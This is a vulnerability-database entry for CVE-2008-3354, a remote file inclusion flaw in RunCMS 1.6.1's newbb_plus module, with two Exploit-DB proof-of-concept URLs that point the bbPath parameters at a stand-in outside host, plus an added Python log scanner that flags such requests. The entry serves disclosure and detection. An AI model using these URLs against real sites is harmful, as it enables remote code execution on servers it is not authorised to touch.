CVE-2008-3354
Published 2008-07-28
Priority: P3 · 42 · high · 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.54% (83.0th percentile)
Multiple PHP remote file inclusion vulnerabilities in the Newbb Plus (newbb_plus) module 0.93 in RunCMS 1.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) bbPath[path] parameter to votepolls.php and the (2) bbPath[root_theme] parameter to config.php, different vectors than CVE-2006-0659. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| runcms | newbb_plus_module | — | — |
| runcms | runcms | — | — |
Exploit-DB
RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion
exploitdb·2008-07-21
---
source: https://www.securityfocus.com/bid/30331/info
RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
RunCMS 1.6.1 is vulnerable; other versions may be affected as well.
http://www.example.com/modules/newbb_plus/config.php?bbPath[root_theme]=http://www.example2.com
Exploit-DB
RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion
exploitdb·2008-07-21
---
source: https://www.securityfocus.com/bid/30331/info
RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
RunCMS 1.6.1 is vulnerable; other versions may be affected as well.
http://www.example.com/modules/newbb_plus/votepolls.php?bbPath[path]=http://www.example2.com
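
A log check for the two vectors listed above, added here as an example and not taken from the advisory or from any RunCMS tooling: it scans web-server access-log lines for requests to the two newbb_plus scripts whose `bbPath` parameter carries a URL. The log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameter pairs named in the CVE-2008-3354 description.
VULNERABLE = {
    "votepolls.php": "bbPath[path]",
    "config.php": "bbPath[root_theme]",
}
# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a URL scheme (http://, https://, ftp://, ...).
REMOTE_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)

# Constructed sample lines: documentation IP ranges and the page's example hosts.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jul/2008:10:00:01 +0000] '
    '"GET /modules/newbb_plus/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Jul/2008:10:00:05 +0000] "GET /modules/newbb_plus/'
    'config.php?bbPath[root_theme]=http://www.example2.com HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/Jul/2008:10:00:09 +0000] "GET /modules/newbb_plus/'
    'votepolls.php?bbPath%5Bpath%5D=http%3A%2F%2Fwww.example2.com HTTP/1.1" 200 298',
    '192.0.2.10 - - [21/Jul/2008:10:01:30 +0000] '
    '"GET /modules/newbb_plus/votepolls.php?poll_id=3 HTTP/1.1" 200 4100',
]


def find_rfi_attempts(log_lines):
    """Return (line_no, script, param, value) for each matching request."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        path = unquote(target.path).lower()
        script = path.rsplit("/", 1)[-1]
        param = VULNERABLE.get(script)
        if param is None or "/newbb_plus/" not in path:
            continue
        # parse_qsl percent-decodes keys and values, so %5B/%5D forms match too.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == param and REMOTE_RE.match(value):
                hits.append((line_no, script, key, value))
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("line %d: %s %s=%s" % hit)
```

Only query strings are inspected; a parameter sent in a POST body does not appear in a standard access log.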